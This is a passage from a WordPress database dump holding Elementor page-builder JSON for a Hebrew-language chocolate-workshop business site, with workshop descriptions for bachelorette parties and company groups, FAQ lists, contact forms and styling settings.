\\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1161,235,'_elementor_version','0.4'),(1162,235,'_elementor_template_type','post'),(1172,237,'_wp_page_template','elementor_header_footer'),(1173,237,'_elementor_edit_mode','builder'),(1174,237,'_elementor_template_type','post'),(1175,237,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1176,237,'_elementor_version','0.4'),(1184,100,'_elementor_template_type','wp-post'),(1186,239,'_wp_page_template','elementor_header_footer'),(1187,239,'_elementor_edit_mode','builder'),(1188,239,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 